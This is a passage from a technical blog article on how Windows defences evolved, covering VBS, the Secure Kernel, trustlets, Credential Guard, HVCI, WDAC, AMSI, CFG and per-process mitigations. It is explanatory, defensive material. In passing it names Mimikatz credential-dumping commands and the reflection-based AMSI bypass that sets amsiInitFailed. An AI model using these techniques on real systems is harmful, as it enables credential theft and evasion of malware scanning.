&lt;p&gt;&lt;strong&gt;Generation A2 -- the kernel monitors the kernel (2005-2014).&lt;/strong&gt; PatchGuard, KMCS, Driver Signing Enforcement. We have already met this generation. Microsoft did not abandon these defenses; the Windows kernel still bugchecks on PatchGuard violations today. But by 2014 the security research community had collectively documented enough kernel-mode bypasses that nobody serious treated PatchGuard as a primary defense [@ms-patchguard] [@skywing-patchguard]. Its function was to raise the cost of low-skill kernel rootkits, not to stop a SYSTEM-privileged attacker.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation A3 -- the process is sandboxed (2008-2015).&lt;/strong&gt; Internet Explorer&apos;s Protected Mode (2006), Chrome&apos;s renderer sandbox (2008), and Microsoft&apos;s own &lt;a href=&quot;https://paragmali.com/blog/appcontainer-and-lowbox-tokens-windowss-capability-sandbox/&quot; rel=&quot;noopener&quot;&gt;AppContainer model&lt;/a&gt; in Windows 8 (2012) reduced the privilege of risky processes -- the browser tab, the document parser, the network listener -- below that of the parent user [@ms-appcontainer]. The threat model is RCE-in-renderer. The threat model is &lt;em&gt;not&lt;/em&gt; SYSTEM-privilege takeover, because a sandbox does not stop credential theft once an attacker is already inside the user&apos;s session at full privilege. James Forshaw&apos;s August 2016 demonstration of AppContainer escape via shadow object directories closed the chapter [@pz-forshaw-shadow]. Sandboxes remain essential at the edge; they do not solve the post-exploitation problem.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation A4 -- cross-privilege isolation (2012-2015).&lt;/strong&gt; Bromium&apos;s vSentry, launched commercially in September 2012, was the first product to deliver the idea that mattered: a Type-1 micro-hypervisor running underneath the Windows kernel, with each risky task placed in its own micro-VM [@silicon-bromium] [@wiki-bromium]. The hypervisor sits at a privilege level the guest kernel cannot reach. If the guest kernel falls, the micro-VM is destroyed and the rest of the host is untouched. By 2015, Microsoft had taken the same architectural idea and built it into the operating system. Generation A4 is the only generation in which the defender&apos;s privilege level changes.&lt;/p&gt;

flowchart LR
    A1[Generation A2&lt;br /&gt;2005-2014&lt;br /&gt;Kernel monitors kernel&lt;br /&gt;PatchGuard, KMCS, DSE]
    A2[Generation A3&lt;br /&gt;2008-2015&lt;br /&gt;Process sandbox&lt;br /&gt;AppContainer, Protected Mode]
    A3[Generation A4&lt;br /&gt;2012-2015&lt;br /&gt;Cross-privilege isolation&lt;br /&gt;Bromium uVisor, then VBS]
    A1 --&amp;gt; R1[Outcome&lt;br /&gt;Same ring as attacker&lt;br /&gt;Same-privilege bypass]
    A2 --&amp;gt; R2[Outcome&lt;br /&gt;Below user privilege&lt;br /&gt;Wrong threat model for SYSTEM-takeover]
    A3 --&amp;gt; R3[Outcome&lt;br /&gt;Above guest kernel&lt;br /&gt;Defender unreachable from VTL0]
&lt;p&gt;The structural lesson, said plainly: &lt;em&gt;the only escape from the same-privilege paradox is to move the defender&apos;s privilege level, not to harden the gate.&lt;/em&gt;&lt;/p&gt;

HP Inc. acquired Bromium in September 2019 [@wiki-bromium]. The uVisor concept survived as HP Sure Click, a vertical-market product shipped on HP business notebooks. Bromium&apos;s contribution to the public story of Windows security is that it shipped the cross-privilege-isolation thesis as a working commercial product three years before Microsoft put it in the box. The reader who sees &quot;Bromium&quot; in a vendor presentation now knows the lineage: same idea, narrower market, earlier ship date.
&lt;p&gt;What did Microsoft actually ship?&lt;/p&gt;
&lt;h2&gt;5. The Breakthrough: VBS, the Secure Kernel, and Trustlets&lt;/h2&gt;
&lt;p&gt;On July 29, 2015, Microsoft shipped Windows 10 version 1507, build 10240 [@wiki-win10-versions]. The same release window delivered five components -- Virtualization-Based Security, Credential Guard, Device Guard with Windows Defender Application Control, the Antimalware Scan Interface, and Control Flow Guard. One week later, on August 6, Alex Ionescu walked onto the Black Hat USA stage in Las Vegas and explained the internals in a deck titled &lt;em&gt;Battle of SKM and IUM: How Windows 10 Rewrites OS Architecture&lt;/em&gt; [@ionescu-bh2015].&lt;/p&gt;
&lt;p&gt;That deck is the load-bearing primary for the rest of this section. Where the prose below cites an internal mechanism -- an EKU OID, a process attribute, a syscall ordinal -- it is reading Ionescu first and Microsoft Learn second.&lt;/p&gt;

A Windows security architecture that uses hardware virtualization extensions (Intel VT-x, AMD-V) and Second-Level Address Translation to run two isolated kernel environments on the same physical machine: the conventional NT kernel and a stripped-down Secure Kernel. Microsoft&apos;s official framing is that VBS &quot;creates an isolated virtual environment that becomes the root of trust of the OS that assumes the kernel can be compromised&quot; [@ms-vbs].
&lt;h3&gt;5.1 Hyper-V as the substrate&lt;/h3&gt;
&lt;p&gt;VBS does not invent a new hypervisor. It reuses the &lt;a href=&quot;https://paragmali.com/blog/above-ring-zero-how-the-windows-hypervisor-became-a-security/&quot; rel=&quot;noopener&quot;&gt;Hyper-V hypervisor&lt;/a&gt; Microsoft had already shipped for Server 2008 and matured through Server 2012 [@ms-tlfs-vsm]. On a machine with VBS enabled, the Windows boot path is: UEFI Secure Boot -&amp;gt; Hyper-V hypervisor -&amp;gt; Hyper-V root partition. Inside that root partition, the NT kernel runs in one Virtual Trust Level and the &lt;a href=&quot;https://paragmali.com/blog/the-windows-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;Secure Kernel&lt;/a&gt; runs in another.&lt;/p&gt;

A Hyper-V hypervisor abstraction that partitions a single virtual machine into multiple privilege domains. Higher-numbered VTLs are strictly more privileged than lower-numbered ones; lower VTLs cannot read or write higher-VTL memory. The Hyper-V Top-Level Functional Specification reserves up to 16 VTLs, of which only VTL0 (NT kernel) and VTL1 (Secure Kernel) are used in shipped Windows configurations [@ms-tlfs-vsm].
&lt;p&gt;A process running with full SYSTEM privilege in VTL0 sees the conventional NT API surface. It can call &lt;code&gt;NtReadVirtualMemory&lt;/code&gt; on any VTL0 process. It cannot read VTL1 memory at all, because the hypervisor&apos;s Extended Page Tables for VTL1 simply do not map VTL1 pages into the VTL0 address space. The Mimikatz dumper that read &lt;code&gt;lsass.exe&lt;/code&gt; in 2011 is technically still running on the new machine. It is just reading the empty husk of LSASS, because the secret bytes were never copied into VTL0 in the first place.&lt;/p&gt;
&lt;h3&gt;5.2 The Secure Kernel&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;securekernel.exe&lt;/code&gt;, the binary that backs VTL1, is on the order of a few hundred kilobytes. It has no device drivers. It has no graphics stack. Its scheduler is minimal [@ionescu-bh2015]. Its paging is handled by asking the VTL0 NT kernel for help -- the Secure Kernel treats the NT kernel as an untrusted resource manager that may return a page or not, and signs and encrypts anything it sends out to be paged. The smallness is not aesthetic. Smallness is part of the threat model. The Secure Kernel is small so that its attack surface is enumerable, and so that the team responsible for its correctness can review every line.The audited binary size is also why VBS does not run user applications in VTL1. The Secure Kernel hosts only &quot;trustlets&quot; -- a tightly bounded set of Microsoft-signed processes designed to do one cryptographic or measurement task each. Putting your code in VTL1 is not on the application developer&apos;s path; it is a privilege Microsoft grants its own modules.&lt;/p&gt;
&lt;h3&gt;5.3 Isolated User Mode and trustlets&lt;/h3&gt;
&lt;p&gt;Above the Secure Kernel, in user-mode VTL1, runs a stripped-down user-mode environment Microsoft calls Isolated User Mode (IUM). The processes hosted by IUM are called &lt;a href=&quot;https://paragmali.com/blog/vbs-trustlets-what-actually-runs-in-the-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;trustlets&lt;/a&gt;.&lt;/p&gt;

The VTL1 user-mode environment in which trustlets execute. IUM provides a deliberately reduced syscall surface compared to VTL0 user mode -- Ionescu&apos;s BH 2015 deck enumerates an approximately 48-syscall allow-list, all routed through the Secure Kernel rather than through `ntoskrnl.exe` [@ionescu-bh2015].

A Microsoft-signed process that runs in Isolated User Mode and is protected from VTL0 inspection. A binary becomes a trustlet only by passing five gates at process creation, all enumerated in Ionescu&apos;s Black Hat 2015 deck [@ionescu-bh2015]: (1) a process attribute set on the `NtCreateProcessEx` call, (2) two Enhanced Key Usage OIDs in the Authenticode signature at Signature Level 12 -- the Microsoft Windows System Component Verification EKU `1.3.6.1.4.1.311.10.3.6` and the IUM EKU `1.3.6.1.4.1.311.10.3.37`, (3) a `.tpolicy` PE section, (4) a Trustlet Instance GUID, and (5) loading via the trustlet-specific loader that enforces the syscall allow-list.
&lt;p&gt;The two EKU OIDs are worth memorizing because they are the primary way a defender or auditor can tell, by inspecting a signed binary, whether it is permitted to run as a trustlet at all. Ionescu&apos;s deck flagged a typographic error in one OID on a slide; cross-cite Microsoft documentation for the canonical form. The OIDs above are the canonical form [@ionescu-bh2015].&lt;/p&gt;
&lt;p&gt;The five-gate pattern matters because it explains what an attacker has to do to &lt;em&gt;create&lt;/em&gt; a trustlet, and the answer is: forge a Microsoft signature. The five gates are not security in series; they are security in identity. A binary either has the EKUs Microsoft issues or it does not.&lt;/p&gt;
&lt;h3&gt;5.4 The canonical 1507-era trustlet roster&lt;/h3&gt;
&lt;p&gt;Three trustlets shipped in the first 1507 wave. Ionescu&apos;s deck enumerates their integer IDs [@ionescu-bh2015]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Trustlet ID 1 -- LSAISO&lt;/strong&gt; (the Local Security Authority Isolated). The Credential Guard secret-keeper. Holds the NTLM hashes, the Kerberos Ticket Granting Tickets, and any other credentials Credential Guard is protecting.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Trustlet ID 2 -- vTPM&lt;/strong&gt;. The virtual Trusted Platform Module used by Hyper-V shielded VMs in the Server 2016 timeframe.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Trustlet ID 3 -- the Biometrics trustlet&lt;/strong&gt; (Windows Hello). Holds biometric template data; in later Windows 11 documentation the same isolation primitive is marketed as Enhanced Sign-in Security (ESS), but that name is a Windows 11-era rebrand and post-dates the 2015 enumeration.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;ID 0 in the IUM trustlet table is reserved as a system bootstrap slot per the table&apos;s 1-indexing convention; the publicly available 1507-era material -- Ionescu&apos;s Black Hat USA 2015 deck and the &lt;em&gt;Windows Internals&lt;/em&gt; 7th edition Chapter 7 -- does not separately attest ID 0 as an end-user-deployable trustlet, so it is best read as a system-reserved slot rather than as a named credential-isolation primitive [@ionescu-bh2015] [@mspress-windows-internals-7e].&lt;/p&gt;

The trustlet that backs Credential Guard. The conventional LSASS process continues to run in VTL0 and answers the same API calls it always did, but on a Credential Guard-enabled system the NTLM hash and Kerberos TGT are stored inside LSAISO in VTL1. When LSASS needs to use a credential -- for example, to construct a Kerberos pre-authentication response -- it crosses the secure-call channel to LSAISO, which performs the cryptographic operation inside VTL1 and returns only the derived result. The raw secret never crosses the VTL boundary back into VTL0 [@ms-credential-guard].
&lt;h3&gt;5.5 The secure-call channel&lt;/h3&gt;
&lt;p&gt;VTL0 and VTL1 talk via a small set of secure-call ordinals. The canonical primitive Ionescu names is &lt;code&gt;IumSetTrustletInstance&lt;/code&gt; at ordinal &lt;code&gt;0x80000001&lt;/code&gt;, paired with a handful of agent-trustlet RPC patterns [@ionescu-bh2015]. The semantic invariant is the same on every call: VTL0 sends a request, VTL1 performs work on protected data, VTL1 returns either a result the requester is permitted to see or a failure. The secret never leaves VTL1.&lt;/p&gt;

flowchart TB
    HW[Hardware&lt;br /&gt;CPU with VT-x/AMD-V&lt;br /&gt;SLAT, IOMMU, TPM 2.0]
    UEFI[UEFI Secure Boot]
    HV[Hyper-V hypervisor]
    HW --&amp;gt; UEFI --&amp;gt; HV
    subgraph VTL0[VTL0 -- NT environment]
        NTK[NT kernel&lt;br /&gt;ntoskrnl.exe, drivers]
        UMP[User-mode processes&lt;br /&gt;LSASS, services, apps]
        NTK --- UMP
    end
    subgraph VTL1[VTL1 -- Secure environment]
        SK[Secure Kernel&lt;br /&gt;securekernel.exe]
        IUM[Isolated User Mode&lt;br /&gt;trustlets: LSAISO, vTPM, ESS]
        SK --- IUM
    end
    HV --&amp;gt; VTL0
    HV --&amp;gt; VTL1
    VTL0 -.secure-call channel.-&amp;gt; VTL1
    ATK[Attacker reach&lt;br /&gt;caps at VTL0 SYSTEM] -.-&amp;gt; NTK
&lt;p&gt;The diagram is worth reading twice. The attacker&apos;s reachable privilege ceiling is the dashed line into VTL0. Everything above the secure-call channel is, by hardware-enforced page-table convention, unreachable from below.&lt;/p&gt;

sequenceDiagram
    participant App as Caller
    participant NT as NT kernel
    participant Loader as Trustlet loader
    participant SK as Secure Kernel
    App-&amp;gt;&amp;gt;NT: NtCreateProcessEx with trustlet process attribute
    NT-&amp;gt;&amp;gt;Loader: Validate Authenticode signature
    Loader-&amp;gt;&amp;gt;Loader: Check EKU 1.3.6.1.4.1.311.10.3.6
    Loader-&amp;gt;&amp;gt;Loader: Check EKU 1.3.6.1.4.1.311.10.3.37
    Loader-&amp;gt;&amp;gt;Loader: Parse .tpolicy PE section
    Loader-&amp;gt;&amp;gt;SK: Assign Trustlet Instance GUID
    SK-&amp;gt;&amp;gt;SK: Install reduced syscall allow-list
    SK--&amp;gt;&amp;gt;App: Trustlet process handle
&lt;h3&gt;5.6 The conceptual hinge&lt;/h3&gt;
&lt;p&gt;Stop here and reread the architecture. The NT kernel is still compromisable. A driver bug, a BYOVD attack, a kernel race condition -- all of those still pop SYSTEM in VTL0 the same way they did in 2014. VBS does not pretend otherwise. The Microsoft Learn VBS landing page is explicit that VBS &quot;assumes the kernel can be compromised&quot; [@ms-vbs]. The defensive invariant has nothing to do with keeping attackers out of the NT kernel. The defensive invariant is that the secrets they came for are not in the NT kernel.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; VBS does not protect the NT kernel from compromise. It guarantees that even a fully-compromised NT kernel cannot reach the secrets held in VTL1 trustlets.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That sentence is the entire defensive thesis of Windows 10. Once a reader has it, every component shipped between 1507 and 1909 -- Credential Guard, HVCI, AMSI, CFG, Process Mitigation Policies -- reads as a follow-on instance of the same trust-topology move, modulated by what is hardware-rooted versus software-instrumented.&lt;/p&gt;
&lt;p&gt;LSAISO holds the NTLM hash and the Kerberos TGT. That handles credential theft. What about the rest of the attack surface?&lt;/p&gt;
&lt;h2&gt;6. The 2019 Defensive Stack&lt;/h2&gt;
&lt;p&gt;By Windows 10 version 1909, shipped November 12, 2019 [@ms-release-info] [@wiki-win10-versions], the VBS architecture had grown a six-feature shipping stack -- Credential Guard, HVCI, WDAC, AMSI, CFG, and Process Mitigation Policies -- plus a cloud-backed endpoint detection and response backend in Defender Advanced Threat Protection. Each closes a specific attack class. Each has a deliberate, named bypass surface. The mature defender&apos;s question by the end of 2019 was no longer &quot;is it deployed&quot; but &quot;which class is left.&quot;&lt;/p&gt;
&lt;h3&gt;6.1 Credential Guard&lt;/h3&gt;
&lt;p&gt;Microsoft&apos;s documentation describes &lt;a href=&quot;https://paragmali.com/blog/the-empty-hash-credential-guard-the-lsaiso-trustlet-and-the-/&quot; rel=&quot;noopener&quot;&gt;Credential Guard&apos;s scope&lt;/a&gt; precisely: it &quot;prevents credential theft attacks by protecting NTLM password hashes, Kerberos Ticket Granting Tickets (TGTs), and credentials stored by applications as domain credentials&quot; [@ms-credential-guard]. Mechanism: LSA in VTL0 retains the API surface; the secret bytes relocate to LSAISO in VTL1; the secure-call dispatch performs the cryptographic step and returns derived output. The Mimikatz LSASS-scrape family -- &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt;, &lt;code&gt;sekurlsa::tickets&lt;/code&gt;, &lt;code&gt;lsadump::secrets&lt;/code&gt; -- returns empty fields on a Credential Guard-enabled system because the bytes it scans for are no longer in the address space it can read.&lt;/p&gt;
&lt;p&gt;What Credential Guard does &lt;em&gt;not&lt;/em&gt; stop is worth naming, because the apologist failure mode is to claim it stops everything. It does not stop pass-the-ticket replay of a TGT captured before Credential Guard was enabled. It does not stop sign-in-time keylogging that scrapes the plaintext password as the user types it. It does not stop a stolen-DC-krbtgt attack that forges Golden Tickets offline. And it does not retroactively scrub credentials presented over RDP outside Restricted Admin mode. Each of those is a meaningful threat. Each lives in a class Credential Guard was not engineered to address.&lt;/p&gt;

sequenceDiagram
    participant App as Application
    participant LSA as LSA (VTL0)
    participant SCD as Secure-call dispatch
    participant ISO as LSAISO (VTL1)
    App-&amp;gt;&amp;gt;LSA: LsaCallAuthenticationPackage
    LSA-&amp;gt;&amp;gt;SCD: secure-call with TGT request
    SCD-&amp;gt;&amp;gt;ISO: forwarded across VTL boundary
    ISO-&amp;gt;&amp;gt;ISO: derive Kerberos session key with stored TGT
    ISO--&amp;gt;&amp;gt;SCD: derived session key (raw TGT stays in VTL1)
    SCD--&amp;gt;&amp;gt;LSA: derived result
    LSA--&amp;gt;&amp;gt;App: success
&lt;h3&gt;6.2 HVCI&lt;/h3&gt;

A Windows VBS feature, also marketed as Memory Integrity, that uses the Hyper-V hypervisor to enforce write-XOR-execute on VTL0 kernel pages via Extended Page Tables. Microsoft&apos;s documentation calls HVCI a &quot;critical component that protects and hardens Windows by running kernel mode code integrity within the isolated virtual environment of VBS&quot; [@ms-hvci]. The practical effect is that the classical kernel code-injection attack class -- write shellcode into a kernel page, then execute -- is closed.
&lt;p&gt;&lt;a href=&quot;https://paragmali.com/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/&quot; rel=&quot;noopener&quot;&gt;HVCI&lt;/a&gt; shipped first in Windows 10 1507 in limited form, and rolled out broadly with the 1607 Anniversary Update. Its enforcement is hardware-accelerated by Intel&apos;s Mode-Based Execute Control or AMD&apos;s equivalent Guest Mode Execute Trap [@ms-hvci]. On supported silicon, the kernel-page W^X check happens in EPT permission bits with no measurable per-page-fault overhead. The attack class HVCI does not close is not &quot;rootkit&quot;; the attack class HVCI does close is &quot;kernel code injection&quot;. An attacker can still call existing kernel functions in unintended sequences -- the data-only kernel attack -- and that is a known and acknowledged residual.&lt;/p&gt;
&lt;h3&gt;6.3 WDAC&lt;/h3&gt;
&lt;p&gt;Windows Defender Application Control, the rebranded successor to Device Guard&apos;s code-integrity component, enforces kernel-mode and user-mode code-integrity policy authored in XML and compiled to a binary &lt;code&gt;.cip&lt;/code&gt; file [@ms-wdac]. The policy is consulted at every image load by &lt;code&gt;CI.dll&lt;/code&gt;. Signed-policy mode binds the policy to a signing key and rejects updates that are not co-signed by the same key, which is the canonical answer to the &quot;attacker rewrites the policy file from SYSTEM&quot; objection.&lt;/p&gt;
&lt;p&gt;WDAC&apos;s known weaknesses are not architectural. They are XML-authoring complexity (production policies routinely run to thousands of rules), bring-your-own-vulnerable-driver against permissive driver allow-lists, and abuse of legitimately-signed Living-Off-the-Land binaries -- &lt;code&gt;rundll32.exe&lt;/code&gt;, &lt;code&gt;regsvr32.exe&lt;/code&gt;, &lt;code&gt;msbuild.exe&lt;/code&gt; -- that pass any signature-based allow-list because Microsoft signed them itself. AppLocker, the older peer technology that ships in Pro SKUs, is functionally subsumed; new deployments default to WDAC [@ms-wdac].&lt;/p&gt;
&lt;h3&gt;6.4 AMSI&lt;/h3&gt;
&lt;p&gt;The &lt;a href=&quot;https://paragmali.com/blog/amsi-the-pre-execution-window-defender/&quot; rel=&quot;noopener&quot;&gt;Antimalware Scan Interface&lt;/a&gt; is a Component Object Model interface that lets script-host runtimes -- PowerShell, Windows Script Host (JScript and VBScript), Office VBA, and WMI -- hand a freshly-deobfuscated string buffer to the configured anti-malware provider before executing it [@ms-amsi].&lt;/p&gt;

A user-mode COM interface introduced in Windows 10 1507 that allows scripting and macro hosts to submit a buffer (typically a deobfuscated script body) to the configured anti-malware provider for inspection before execution. Lee Holmes&apos;s June 9, 2015 Microsoft Security Blog post announced AMSI alongside the Windows 10 1507 ship [@ms-leeholmes-amsi]. Microsoft Defender is the default provider; third-party engines register via `IAntimalwareProvider`.
&lt;p&gt;AMSI matters because pre-AMSI, an obfuscated PowerShell command line was opaque to the anti-malware engine until after it had run. AMSI runs the engine on the post-deobfuscation buffer. The engine sees the cleartext.&lt;/p&gt;
&lt;p&gt;The bypass class AMSI exposes is a deliberate tradeoff. AMSI is a hook from user-mode script hosts. An attacker who already has code execution in the same user-mode process can patch the AMSI hook out -- the canonical reflection trick sets &lt;code&gt;AmsiUtils.amsiInitFailed&lt;/code&gt; to &lt;code&gt;True&lt;/code&gt; via .NET reflection, and MDSec&apos;s June 2018 PowerShell AMSI evasion write-up walks through the family in detail [@mdsec-amsi-bypass]. AMSI is a hook, not a sandbox. The bypass surface is part of the design tradeoff.&lt;/p&gt;

AMSI did not ship as a single event. Windows 10 1507 (July 2015) brought PowerShell 5.0, Windows Script Host, and Office VBA macro coverage. Office 365 client applications integrated AMSI for Office VBA macros in September 2018 per Microsoft&apos;s announcement [@ms-office-amsi]. The Windows 10 1903 release in May 2019 added the AMSI-for-WMI provider [@ms-win10-1903]. The same product name covered four very different runtimes, and the runtime that was missing from your endpoint was the runtime an attacker used. Treat &quot;AMSI is enabled&quot; as a question with four sub-questions until 1903.
&lt;h3&gt;6.5 Control Flow Guard&lt;/h3&gt;
&lt;p&gt;Burow, Carr, Nash, Larsen, Brunthaler, Payer, and Franz&apos;s 2017 ACM Computing Surveys review &lt;em&gt;Control-Flow Integrity: Precision, Security, and Performance&lt;/em&gt; is the academic reference that classifies what &lt;a href=&quot;https://paragmali.com/blog/control-flow-integrity-on-windows-cfg-xfg-and-the-cet-shadow/&quot; rel=&quot;noopener&quot;&gt;CFG&lt;/a&gt; actually is [@burow-cfi-csur2017]. In the Burow et al. taxonomy, CFG is forward-edge, coarse-grained, software CFI.&lt;/p&gt;

A platform security feature that &quot;was created to combat memory corruption vulnerabilities&quot; by validating indirect call targets against a compile-time-known set of valid functions [@ms-cfg]. The compiler emits a call to `__guard_check_icall_fptr` before every indirect call; the runtime consults an OS-maintained bitmap of valid call targets in the loaded process image; an invalid target traps to the kernel and the process is terminated.
&lt;p&gt;The mechanism is small enough to describe in code. The OS maintains a per-process bitmap indexed by 16-byte-aligned function addresses; each bit indicates whether that address is a valid indirect-call target. Before every indirect call, the compiler emits a bitmap lookup. If the bit is clear, the program is terminated.&lt;/p&gt;
&lt;p&gt;{`
// Simulated CFG bitmap and indirect-call check
const bitmap = new Uint8Array(1024);&lt;/p&gt;
&lt;p&gt;function markValidTarget(addr) {
  // Each bit covers a 16-byte-aligned function address
  const bitIndex = (addr &amp;gt;&amp;gt; 4);
  bitmap[bitIndex &amp;gt;&amp;gt; 3] |= (1 &amp;lt;&amp;lt; (bitIndex &amp;amp; 7));
}&lt;/p&gt;
&lt;p&gt;function guardCheckIcall(targetAddr) {
  const bitIndex = (targetAddr &amp;gt;&amp;gt; 4);
  const isValid = (bitmap[bitIndex &amp;gt;&amp;gt; 3] &amp;gt;&amp;gt; (bitIndex &amp;amp; 7)) &amp;amp; 1;
  if (!isValid) {
    throw new Error(&apos;CFG violation: terminate process&apos;);
  }
}&lt;/p&gt;
&lt;p&gt;markValidTarget(0x1400);
markValidTarget(0x1500);&lt;/p&gt;
&lt;p&gt;guardCheckIcall(0x1400);
console.log(&apos;Valid call site allowed.&apos;);&lt;/p&gt;
&lt;p&gt;try {
  guardCheckIcall(0x1410);
} catch (e) {
  console.log(e.message);
}
`}&lt;/p&gt;
&lt;p&gt;The known limits of CFG are the limits Burow et al. enumerate for forward-edge, coarse-grained, software CFI in general [@burow-cfi-csur2017]. CFG protects only forward edges -- indirect calls and indirect jumps -- so an attacker who corrupts a return address is unaffected by CFG and needs a backward-edge defense (Intel Control-flow Enforcement Technology shadow stacks, in the Part 5 story). CFG&apos;s bitmap is coarse: any function whose address is taken is a valid target. And non-CFG-instrumented DLLs in the process create gaps; the bitmap has no bit set for code the compiler did not see.&lt;/p&gt;
&lt;h3&gt;6.6 Process Mitigation Policies&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://paragmali.com/blog/process-mitigation-policies-cfg-acg-cig-and-the-layer-betwee/&quot; rel=&quot;noopener&quot;&gt;Per-app process mitigation policies&lt;/a&gt;, exposed in 1709 (October 2017) through the Windows Defender Exploit Guard GUI and the PowerShell &lt;code&gt;Set-ProcessMitigation&lt;/code&gt; cmdlet [@ms-exploit-protection] [@ms-set-processmitigation], unified the menagerie of legacy Enhanced Mitigation Experience Toolkit settings into a documented, group-policy-deployable per-process opt-in. The kernel-side &lt;code&gt;PROCESS_MITIGATION_POLICY_INFORMATION&lt;/code&gt; API shipped in Windows 8; the per-app management surface arrived three years later. Each policy in the 1709 set closes a specific exploitation primitive at the per-process boundary. The ones worth knowing by mechanism:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Arbitrary Code Guard (ACG).&lt;/strong&gt; ACG refuses to commit a page as &lt;code&gt;PAGE_EXECUTE_READWRITE&lt;/code&gt; and refuses any &lt;code&gt;VirtualProtect&lt;/code&gt; request that adds executable permission to a page that was previously non-executable. The kernel&apos;s &lt;code&gt;MiArbitraryUserPointer&lt;/code&gt; and &lt;code&gt;MiAllocateVirtualMemory&lt;/code&gt; paths fail those requests with &lt;code&gt;STATUS_DYNAMIC_CODE_BLOCKED&lt;/code&gt;. The effect is process-level W^X: an attacker who lands a write primitive cannot turn it into a JIT-the-shellcode-then-execute primitive. The Microsoft Edge content process is the canonical example. Edge&apos;s JavaScript JIT runs &lt;em&gt;out-of-process&lt;/em&gt; in a separate JIT-only process and ships compiled code to the renderer through a one-way shared-memory channel, so the renderer itself never needs an RWX page. The flag name is &lt;code&gt;PROCESS_CREATION_MITIGATION_POLICY_PROHIBIT_DYNAMIC_CODE_ALWAYS_ON&lt;/code&gt; [@ms-set-processmitigation].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Code Integrity Guard (CIG).&lt;/strong&gt; CIG refuses to load any DLL whose Authenticode signature does not chain to a Microsoft trust root. The PE load path in &lt;code&gt;MiLoadImage&lt;/code&gt; validates the signature and fails with &lt;code&gt;STATUS_INVALID_IMAGE_HASH&lt;/code&gt; or &lt;code&gt;STATUS_INVALID_SIGNATURE&lt;/code&gt; if the policy is violated. This closes the &quot;drop a malicious DLL in the search path and let &lt;code&gt;LoadLibrary&lt;/code&gt; find it&quot; exploitation class for a content process. The flag is &lt;code&gt;PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON&lt;/code&gt;. CIG composes with WDAC at the system level: CIG is the per-process narrow case, WDAC is the system policy.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Strict Handle Check.&lt;/strong&gt; Strict Handle Check terminates the process on the first invalid handle reference rather than returning &lt;code&gt;STATUS_INVALID_HANDLE&lt;/code&gt; and recovering. Closes handle-reuse and type-confusion exploitation where the attacker substitutes a handle of a different type and rides the resulting use-after-free, which is a recurring browser-sandbox bug pattern. The flag is &lt;code&gt;PROCESS_CREATION_MITIGATION_POLICY_STRICT_HANDLE_CHECKS_ALWAYS_ON&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Image Load mitigations.&lt;/strong&gt; Three related policies harden the DLL loader. &lt;code&gt;PreferSystem32Images&lt;/code&gt; makes the loader prefer &lt;code&gt;\Windows\System32&lt;/code&gt; before searching the application directory, defeating the classic DLL search-order hijack (a malicious &lt;code&gt;version.dll&lt;/code&gt; planted in the app directory). &lt;code&gt;NoLowMandatoryLabelImages&lt;/code&gt; refuses to load DLLs whose mandatory integrity label is Low, closing the &quot;browser sandbox creates a Low-IL file, then the parent process loads it&quot; class. &lt;code&gt;NoRemoteImages&lt;/code&gt; refuses to load DLLs from UNC paths, defeating cross-machine DLL injection.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Disable Win32k System Calls.&lt;/strong&gt; Any syscall whose service-table index is in the Win32k range -- the second syscall service table -- is rejected at the entry-stub level. The mitigation removes the GDI and USER attack surface from the process. The Win32k subsystem has historically been the largest source of kernel CVEs, so processes that do not need a window station -- content processes, network services -- can opt out wholesale. The flag is &lt;code&gt;PROCESS_CREATION_MITIGATION_POLICY_WIN32K_SYSTEM_CALL_DISABLE_ALWAYS_ON&lt;/code&gt;. Edge content processes ship with it on. Chromium&apos;s &lt;code&gt;--disable-win32k-lockdown&lt;/code&gt; flag is the dual-use override developers reach for when something downstream breaks.&lt;/p&gt;
&lt;p&gt;The 1709 set also keeps the conventional triad -- ASLR with bottom-up randomization, Data Execution Prevention, and a NoCFG-allowed-RWX refusal -- applied per-process.&lt;/p&gt;
&lt;p&gt;The Edge content process is the canonical &quot;stack of mitigations&quot; example. It enables almost the full PMP suite simultaneously: ACG, CIG, Disable Win32k, the Image Load mitigations, Strict Handle Check, AppContainer, and an AC sandbox. That stack is what makes an Edge content-process RCE &lt;em&gt;not&lt;/em&gt; equivalent to a SYSTEM-level Windows compromise. The attacker has compromised the renderer, but still faces a sandbox escape, then an elevation of privilege, then (depending on the target) a credential-extraction step before reaching anything Credential Guard then closes.&lt;/p&gt;
&lt;h3&gt;6.7 Defender ATP, later Defender for Endpoint&lt;/h3&gt;
&lt;p&gt;The cloud-backed endpoint detection and response backend launched as Windows Defender Advanced Threat Protection in 2016 and was renamed &lt;a href=&quot;https://paragmali.com/blog/from-cmdexe-to-a-kusto-row-in-90-seconds-how-sysmon-and-defe/&quot; rel=&quot;noopener&quot;&gt;Microsoft Defender for Endpoint&lt;/a&gt; in September 2020 [@ms-mde-overview].&lt;/p&gt;
&lt;p&gt;&quot;Defender ATP&quot; and &quot;Defender for Endpoint&quot; are the same product. The 2020 rename matters only for citation literacy: pre-2020 sources cite ATP, post-2020 sources cite MDE, and confusing the two as separate products is a common reading error.&lt;/p&gt;
